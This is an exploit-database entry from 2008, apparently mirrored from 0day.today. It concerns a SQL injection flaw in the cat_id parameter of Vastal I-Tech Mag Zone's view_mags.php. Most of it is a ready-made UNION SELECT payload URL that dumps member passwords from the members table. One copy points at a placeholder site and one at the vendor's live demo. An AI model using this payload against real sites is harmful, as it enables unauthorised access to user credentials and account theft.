id: 3609
date: 09/04/2008
title: Vastal I-Tech Mag Zone (cat_id) SQL Injection Vulnerability
author: Stack
cves: 

===========================================================
Vastal I-Tech Mag Zone (cat_id) SQL Injection Vulnerability
===========================================================



#######################################################
#  Vastal I-Tech Mag Zone SQL Injection Vulnerability
#
# Author   : Stack
#
# Demo      : http://www.vastal.com/mag/
#######################################################
the exploit fate the password
use ur mind for have the column username
Exploit:
http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
Live Demo
http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*



#  0day.today [2023-03-23]  #